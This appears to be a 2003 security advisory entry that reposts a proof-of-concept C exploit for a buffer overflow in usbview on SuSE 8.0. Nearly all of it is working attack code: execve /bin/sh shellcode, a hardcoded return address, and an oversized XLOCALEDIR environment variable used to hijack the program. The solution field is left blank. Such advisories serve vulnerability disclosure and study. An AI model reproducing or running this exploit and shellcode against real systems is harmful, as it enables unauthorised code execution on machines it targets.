6th Apr 2003 [SBWID-6115]
COMMAND
	Usbview exploit
SYSTEMS AFFECTED
	Usbview on SuSE 8.0 (at least)
PROBLEM
	Thanks to Serkan Akpolat [[email protected]] post :
	
	+-------------------------------
	/* Proof of Concept Code for buffer overflow vulnerability in usbview
	-----------------------*/
	/* usbview uses xf86 libs, which have unsafe strcopy , as it's explained in
	oC-localX.c -  -*/
	/* Long string in XLOCALEDIR env variable causes segmentation
	fault------------------------*/
	/* Usbview ,which comes with SuSE 8.0 isn't by default setuid root
	-----------------------*/
	/* This code has been tested in SuSE 8.0
	------------------------------------------------*/
	/* It spawns a shell with the uid of the user, who runs the
	expolit---------------------*/ 
	/* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr
	team.----------------*/
	/* Rooting Sabotage Forced, turevleri ve ayakci takimina: Basit
	bilginizle------------*/
	/* insanlari kandirmaya calisarak bi yere ulasamazsiniz.(Siz ing.
	anlayamadiginiz ---*/
	/* icin turkce
	yazdim.)-------------------------------------------------------------*/         
	/* Written by Serkan Akpolat For Fun [email protected]
	-----------------------------*/                                                 
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/types.h>
	#define BUFSIZE 6000
	#define PATH "/usr/bin/usbview"
	#define PROGNAME "usbview"
	const char shellcode[] =
	        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
	/* execve /bin/sh                                           */                  
	/* Shellcode from "Buffer Overflow" paper of Murat Balaban */
	int main(void)
	{
	        char *envv=NULL;
	        char buf[BUFSIZE];
	        int i,j,ret;
	        int *ap;   
	        ap = (int *)(buf);
	        ret = 0xbfffe86f;
	        printf("Shellcode is on 0x%08x , Press Enter For a Shell\n",ret);
	        for (i = 0; i < BUFSIZE -4; i += 4)
	                *ap++ = ret;
	        memcpy(buf + 4, shellcode, strlen(shellcode));
	        setenv("XLOCALEDIR", buf, 1);
	        getchar();
	        execl(PATH,PROGNAME,NULL);
	}
	
SOLUTION
	?